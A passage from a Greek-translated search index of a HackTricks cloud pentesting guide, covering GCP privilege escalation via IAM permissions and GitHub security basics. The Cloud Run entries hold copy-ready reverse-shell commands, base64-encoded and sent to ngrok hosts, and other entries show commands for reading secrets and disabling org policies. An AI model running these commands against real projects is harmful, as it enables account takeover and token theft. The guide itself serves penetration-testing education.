Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1027","title":"orgpolicy"},"1028":{"body":"Ένας επιτιθέμενος που εκμεταλλεύεται το orgpolicy.policy.set μπορεί να χειριστεί τις οργανωτικές πολιτικές, οι οποίες θα του επιτρέψουν να αφαιρέσει ορισμένους περιορισμούς που εμποδίζουν συγκεκριμένες λειτουργίες. Για παράδειγμα, ο περιορισμός appengine.disableCodeDownload συνήθως μπλοκάρει τη λήψη του πηγαίου κώδικα του App Engine. Ωστόσο, χρησιμοποιώντας το orgpolicy.policy.set , ένας επιτιθέμενος μπορεί να απενεργοποιήσει αυτόν τον περιορισμό, αποκτώντας έτσι πρόσβαση για να κατεβάσει τον πηγαίο κώδικα, παρά το γεγονός ότι αρχικά ήταν προστατευμένος. bash # Get info\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] Ένα σενάριο python για αυτή τη μέθοδο μπορεί να βρεθεί εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1028","title":"orgpolicy.policy.set"},"1029":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » Αναφορές","id":"1029","title":"Αναφορές"},"103":{"body":"Μια Github Action μπορεί να εκτελείται μέσα στο περιβάλλον github ή μπορεί να εκτελείται σε μια υποδομή τρίτου μέρους που έχει ρυθμιστεί από τον χρήστη. Πολλές οργανώσεις θα επιτρέψουν την εκτέλεση Github Actions σε μια υποδομή τρίτου μέρους καθώς συνήθως είναι φθηνότερη . Μπορείτε να καταγράψετε τους αυτο-φιλοξενούμενους runners μιας οργάνωσης στο https://github.com/organizations//settings/actions/runners Ο τρόπος για να βρείτε ποιες Github Actions εκτελούνται σε μη github υποδομή είναι να αναζητήσετε το runs-on: self-hosted στη διαμόρφωση yaml της Github Action. Δεν είναι δυνατό να εκτελέσετε μια Github Action μιας οργάνωσης μέσα σε ένα αυτο-φιλοξενούμενο box μιας διαφορετικής οργάνωσης επειδή δημιουργείται ένα μοναδικό token για τον Runner κατά την ρύθμισή του για να γνωρίζει πού ανήκει ο runner. Εάν ο προσαρμοσμένος Github Runner είναι ρυθμισμένος σε μια μηχανή μέσα σε AWS ή GCP για παράδειγμα, η Action μπορεί να έχει πρόσβαση στο endpoint μεταδεδομένων και να κλέψει το token του λογαριασμού υπηρεσίας με τον οποίο λειτουργεί η μηχανή.","breadcrumbs":"Github Security » Basic Github Information » Git Action Runner","id":"103","title":"Git Action Runner"},"1030":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1030","title":"GCP - Pubsub Privesc"},"1031":{"body":"Αποκτήστε περισσότερες πληροφορίες στο: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1031","title":"PubSub"},"1032":{"body":"Τα snapshots των θεμάτων περιέχουν τα τρέχοντα unACKed μηνύματα και κάθε μήνυμα μετά από αυτό . Μπορείτε να δημιουργήσετε ένα snapshot ενός θέματος για να αποκτήσετε πρόσβαση σε όλα τα μηνύματα , αποφεύγοντας την άμεση πρόσβαση στο θέμα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1032","title":"pubsub.snapshots.create"},"1033":{"body":"Αναθέστε τις προηγούμενες άδειες σε εσάς.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1033","title":"pubsub.snapshots.setIamPolicy"},"1034":{"body":"Μπορείτε να δημιουργήσετε μια push subscription σε ένα θέμα που θα στέλνει όλα τα ληφθέντα μηνύματα στη δηλωμένη διεύθυνση URL.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1034","title":"pubsub.subscriptions.create"},"1035":{"body":"Ορίστε τη δική σας διεύθυνση URL ως push endpoint για να κλέψετε τα μηνύματα.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1035","title":"pubsub.subscriptions.update"},"1036":{"body":"Αποκτήστε πρόσβαση σε μηνύματα χρησιμοποιώντας την subscription.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1036","title":"pubsub.subscriptions.consume"},"1037":{"body":"Δώστε στον εαυτό σας οποιαδήποτε από τις προηγούμενες άδειες. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1037","title":"pubsub.subscriptions.setIamPolicy"},"1038":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1038","title":"GCP - Resourcemanager Privesc"},"1039":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1039","title":"resourcemanager"},"104":{"body":"Εάν όλες οι ενέργειες (ή μια κακόβουλη ενέργεια) επιτρέπονται, ένας χρήστης θα μπορούσε να χρησιμοποιήσει μια Github action που είναι κακόβουλη και θα συμβιβάσει το container όπου εκτελείται. caution Μια κακόβουλη Github Action που εκτελείται θα μπορούσε να καταχραστεί από τον επιτιθέμενο για να: Κλέψει όλα τα μυστικά στα οποία έχει πρόσβαση η Action Μετακινηθεί οριζόντια εάν η Action εκτελείται μέσα σε μια υποδομή τρίτου μέρους όπου το SA token που χρησιμοποιείται για την εκτέλεση της μηχανής μπορεί να προσπελαστεί (πιθανώς μέσω της υπηρεσίας μεταδεδομένων) Καταχραστεί το token που χρησιμοποιείται από το workflow για να κλέψει τον κώδικα του repo όπου εκτελείται η Action ή ακόμα και να τον τροποποιήσει .","breadcrumbs":"Github Security » Basic Github Information » Git Action Compromise","id":"104","title":"Git Action Compromise"},"1040":{"body":"Όπως στην εκμετάλλευση του iam.serviceAccounts.setIamPolicy, αυτή η άδεια σας επιτρέπει να τροποποιήσετε τις άδειές σας σε οποιοδήποτε πόρο σε επίπεδο οργάνωσης . Έτσι, μπορείτε να ακολουθήσετε το ίδιο παράδειγμα εκμετάλλευσης.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1040","title":"resourcemanager.organizations.setIamPolicy"},"1041":{"body":"Όπως στην εκμετάλλευση του iam.serviceAccounts.setIamPolicy, αυτή η άδεια σας επιτρέπει να τροποποιήσετε τις άδειές σας σε οποιοδήποτε πόρο σε επίπεδο φακέλου . Έτσι, μπορείτε να ακολουθήσετε το ίδιο παράδειγμα εκμετάλλευσης.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1041","title":"resourcemanager.folders.setIamPolicy"},"1042":{"body":"Όπως στην εκμετάλλευση του iam.serviceAccounts.setIamPolicy, αυτή η άδεια σας επιτρέπει να τροποποιήσετε τις άδειές σας σε οποιοδήποτε πόρο σε επίπεδο έργου . Έτσι, μπορείτε να ακολουθήσετε το ίδιο παράδειγμα εκμετάλλευσης. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1042","title":"resourcemanager.projects.setIamPolicy"},"1043":{"body":"Reading time: 4 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Run Privesc","id":"1043","title":"GCP - Run Privesc"},"1044":{"body":"Για περισσότερες πληροφορίες σχετικά με το Cloud Run, ελέγξτε: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1044","title":"Cloud Run"},"1045":{"body":"Ένας επιτιθέμενος με αυτές τις άδειες να δημιουργήσει μια υπηρεσία run που εκτελεί αυθαίρετο κώδικα (αυθαίρετο Docker container), να συνδέσει μια Υπηρεσία Λογαριασμού σε αυτήν και να κάνει τον κώδικα να εξάγει το token της Υπηρεσίας Λογαριασμού από τα μεταδεδομένα . Ένα σενάριο εκμετάλλευσης για αυτή τη μέθοδο μπορεί να βρεθεί εδώ και η εικόνα Docker μπορεί να βρεθεί εδώ . Σημειώστε ότι όταν χρησιμοποιείτε gcloud run deploy αντί να δημιουργήσετε απλώς την υπηρεσία χρειάζεται η άδεια update . Ελέγξτε ένα παράδειγμα εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1045","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1046":{"body":"Όπως η προηγούμενη αλλά ενημερώνοντας μια υπηρεσία: bash # Launch some web server to listen in port 80 so the service works\necho \"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\" | base64\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\n--image=ubuntu:22.04 \\ # Make sure to use an ubuntu version that includes python3\n--command=bash \\\n--args=\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\" \\\n--service-account=\"-compute@developer.gserviceaccount.com\" \\\n--region=us-central1 \\\n--allow-unauthenticated # If you don't have permissions to use \"--allow-unauthenticated\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1046","title":"run.services.update , iam.serviceAccounts.actAs"},"1047":{"body":"Δώστε στον εαυτό σας προηγούμενες άδειες πάνω στο cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1047","title":"run.services.setIamPolicy"},"1048":{"body":"Εκκινήστε μια εργασία με ένα reverse shell για να κλέψετε τον λογαριασμό υπηρεσίας που υποδεικνύεται στην εντολή. Μπορείτε να βρείτε ένα exploit εδώ . bash gcloud beta run jobs create jab-cloudrun-3326 \\\n--image=ubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\" \\\n--service-account=\"@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1048","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1049":{"body":"Παρόμοια με την προηγούμενη, είναι δυνατόν να ενημερώσετε μια εργασία και να ενημερώσετε το SA , την εντολή και να την εκτελέσετε : bash gcloud beta run jobs update hacked \\\n--image=mubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\" \\\n--service-account=-compute@developer.gserviceaccount.com \\\n--region=us-central1 \\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1049","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"105":{"body":"Οι προστασίες branches έχουν σχεδιαστεί για να μην δίνουν πλήρη έλεγχο ενός αποθετηρίου στους χρήστες. Ο στόχος είναι να θέσουν αρκετές μεθόδους προστασίας πριν μπορέσουν να γράψουν κώδικα μέσα σε κάποιο branch . Οι προστασίες branches ενός αποθετηρίου μπορούν να βρεθούν στο https://github.com///settings/branches note Δεν είναι δυνατό να ορίσετε μια προστασία branch σε επίπεδο οργάνωσης . Έτσι, όλες τους πρέπει να δηλωθούν σε κάθε repo. Διαφορετικές προστασίες μπορούν να εφαρμοστούν σε ένα branch (όπως στο master): Μπορείτε να απαιτήσετε μια PR πριν από τη συγχώνευση (έτσι δεν μπορείτε να συγχωνεύσετε απευθείας κώδικα πάνω στο branch). Εάν αυτό επιλεγεί, διαφορετικές άλλες προστασίες μπορούν να ισχύουν: Απαιτήστε έναν αριθμό εγκρίσεων . Είναι πολύ συνηθισμένο να απαιτείται 1 ή 2 περισσότερα άτομα να εγκρίνουν την PR σας ώστε ένας μόνο χρήστης να μην μπορεί να συγχωνεύσει κώδικα απευθείας. Ανακαλέστε τις εγκρίσεις όταν προστεθούν νέες δεσμεύσεις . Διαφορετικά, ένας χρήστης μπορεί να εγκρίνει νόμιμο κώδικα και στη συνέχεια ο χρήστης θα μπορούσε να προσθέσει κακόβουλο κώδικα και να τον συγχωνεύσει. Απαιτήστε αναθεωρήσεις από τους Code Owners . Τουλάχιστον 1 κάτοχος κώδικα του repo πρέπει να εγκρίνει την PR (έτσι οι \"τυχαίοι\" χρήστες δεν μπορούν να την εγκρίνουν) Περιορίστε ποιοι μπορούν να ανακαλέσουν τις αναθεωρήσεις αιτημάτων έλξης. Μπορείτε να καθορίσετε άτομα ή ομάδες που επιτρέπεται να ανακαλέσουν τις αναθεωρήσεις αιτημάτων έλξης. Επιτρέψτε σε καθορισμένους ηθοποιούς να παρακάμψουν τις απαιτήσεις αιτημάτων έλξης . Αυτοί οι χρήστες θα μπορούν να παρακάμψουν τους προηγούμενους περιορισμούς. Απαιτήστε οι έλεγχοι κατάστασης να περάσουν πριν από τη συγχώνευση. Ορισμένοι έλεγχοι πρέπει να περάσουν πριν μπορέσετε να συγχωνεύσετε τη δέσμευση (όπως μια github action που ελέγχει ότι δεν υπάρχει κανένα μυστικό σε καθαρό κείμενο). Απαιτήστε την επίλυση συνομιλιών πριν από τη συγχώνευση . Όλα τα σχόλια στον κώδικα πρέπει να έχουν επιλυθεί πριν μπορέσει να συγχωνευθεί η PR. Απαιτήστε υπογεγραμμένες δεσμεύσεις . Οι δεσμεύσεις πρέπει να είναι υπογεγραμμένες. Απαιτήστε γραμμική ιστορία. Αποτρέψτε τις συγχωνεύσεις δεσμεύσεων να αποστέλλονται σε αντίστοιχα branches. Συμπεριλάβετε τους διαχειριστές . Εάν αυτό δεν έχει ρυθμιστεί, οι διαχειριστές μπορούν να παρακάμψουν τους περιορισμούς. Περιορίστε ποιοι μπορούν να στείλουν σε αντίστοιχα branches . Περιορίστε ποιοι μπορούν να στείλουν μια PR. note Όπως μπορείτε να δείτε, ακόμη και αν καταφέρατε να αποκτήσετε κάποια διαπιστευτήρια ενός χρήστη, τα repos μπορεί να είναι προστατευμένα αποτρέποντάς σας να στείλετε κώδικα στο master για παράδειγμα για να συμβιβάσετε την CI/CD pipeline.","breadcrumbs":"Github Security » Basic Github Information » Branch Protections","id":"105","title":"Branch Protections"},"1050":{"body":"Δώστε στον εαυτό σας τις προηγούμενες άδειες πάνω από τα Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1050","title":"run.jobs.setIamPolicy"},"1051":{"body":"Καταχρήστε τις μεταβλητές περιβάλλοντος μιας εκτέλεσης εργασίας για να εκτελέσετε αυθαίρετο κώδικα και να αποκτήσετε ένα reverse shell για να εξάγετε τα περιεχόμενα του κοντέινερ (πηγαίος κώδικας) και να αποκτήσετε πρόσβαση στο SA μέσα στα μεταδεδομένα: bash gcloud beta run jobs execute job-name --region --update-env-vars=\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1051","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1052":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Αναφορές","id":"1052","title":"Αναφορές"},"1053":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1053","title":"GCP - Secretmanager Privesc"},"1054":{"body":"Για περισσότερες πληροφορίες σχετικά με το secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1054","title":"secretmanager"},"1055":{"body":"Αυτό σας δίνει πρόσβαση για να διαβάσετε τα μυστικά από τον διαχειριστή μυστικών και ίσως αυτό θα μπορούσε να βοηθήσει στην κλιμάκωση των δικαιωμάτων (ανάλογα με τις πληροφορίες που είναι αποθηκευμένες μέσα στο μυστικό): bash # Get clear-text of version 1 of secret: \"\"\ngcloud secrets versions access 1 --secret=\"\" Καθώς αυτή είναι επίσης μια τεχνική μετα-εκμετάλλευσης, μπορεί να βρεθεί σε: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1055","title":"secretmanager.versions.access"},"1056":{"body":"Αυτό σας δίνει πρόσβαση για να διαβάσετε τα μυστικά από τον διαχειριστή μυστικών, όπως χρησιμοποιώντας: bash gcloud secrets add-iam-policy-binding \\\n--member=\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--role=\"roles/secretmanager.secretAccessor\" tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1056","title":"secretmanager.secrets.setIamPolicy"},"1057":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1057","title":"GCP - Serviceusage Privesc"},"1058":{"body":"Οι παρακάτω άδειες είναι χρήσιμες για τη δημιουργία και κλοπή API keys, σημειώστε αυτό από τα έγγραφα: Ένα API key είναι μια απλή κρυπτογραφημένη συμβολοσειρά που ταυτοποιεί μια εφαρμογή χωρίς κανένα κύριο . Είναι χρήσιμα για την πρόσβαση σε δημόσια δεδομένα ανώνυμα , και χρησιμοποιούνται για να συσχετίσουν τα API αιτήματα με το έργο σας για ποσοστά και χρέωση . Επομένως, με ένα API key μπορείτε να κάνετε αυτή την εταιρεία να πληρώσει για τη χρήση του API, αλλά δεν θα μπορείτε να αναβαθμίσετε τα δικαιώματα. Για να μάθετε άλλες άδειες και τρόπους δημιουργίας API keys ελέγξτε: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1058","title":"serviceusage"},"1059":{"body":"Βρέθηκε μια μη τεκμηριωμένη API που μπορεί να χρησιμοποιηθεί για δημιουργία API keys: bash curl -XPOST \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1059","title":"serviceusage.apiKeys.create"},"106":{"body":"https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise https://docs.github.com/en/enterprise-server https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards https://docs.github.com/en/actions/security-guides/encrypted-secrets tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"Github Security » Basic Github Information » References","id":"106","title":"References"},"1060":{"body":"Βρέθηκε μια άλλη μη τεκμηριωμένη API για την καταγραφή των API keys που έχουν ήδη δημιουργηθεί (τα API keys εμφανίζονται στην απάντηση): bash curl \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1060","title":"serviceusage.apiKeys.list"},"1061":{"body":"Με αυτές τις άδειες, ένας επιτιθέμενος μπορεί να ενεργοποιήσει και να χρησιμοποιήσει νέες υπηρεσίες στο έργο. Αυτό θα μπορούσε να επιτρέψει σε έναν επιτιθέμενο να ενεργοποιήσει υπηρεσίες όπως admin ή cloudidentity για να προσπαθήσει να αποκτήσει πρόσβαση σε πληροφορίες του Workspace, ή άλλες υπηρεσίες για να αποκτήσει πρόσβαση σε ενδιαφέροντα δεδομένα.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1061","title":"serviceusage.services.enable , serviceusage.services.use"},"1062":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ Support HackTricks and get benefits! Do you work in a cybersecurity company ? Do you want to see your company advertised in HackTricks ? or do you want to have access the latest version of the PEASS or download HackTricks in PDF ? Check the SUBSCRIPTION PLANS ! Discover The PEASS Family , our collection of exclusive NFTs Get the official PEASS & HackTricks swag Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm . Share your hacking tricks submitting PRs to the hacktricks github repo **** .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » References","id":"1062","title":"References"},"1063":{"body":"Reading time: 4 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1063","title":"GCP - Sourcerepos Privesc"},"1064":{"body":"Για περισσότερες πληροφορίες σχετικά με τα Αποθετήρια Πηγών ελέγξτε: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Αποθετήρια Πηγών","id":"1064","title":"Αποθετήρια Πηγών"},"1065":{"body":"Με αυτή την άδεια είναι δυνατή η λήψη του αποθετηρίου τοπικά: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1065","title":"source.repos.get"},"1066":{"body":"Ένας χρήστης με αυτή την άδεια θα μπορεί να γράψει κώδικα μέσα σε ένα αποθετήριο που έχει κλωνοποιηθεί με gcloud source repos clone . Αλλά σημειώστε ότι αυτή η άδεια δεν μπορεί να προσαρτηθεί σε προσαρμοσμένους ρόλους, οπότε πρέπει να δοθεί μέσω ενός προκαθορισμένου ρόλου όπως: Ιδιοκτήτης Συντάκτης Διαχειριστής Αποθετηρίου Πηγής (roles/source.admin) Συγγραφέας Αποθετηρίου Πηγής (roles/source.writer) Για να γράψετε, απλά εκτελέστε μια κανονική git push .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - 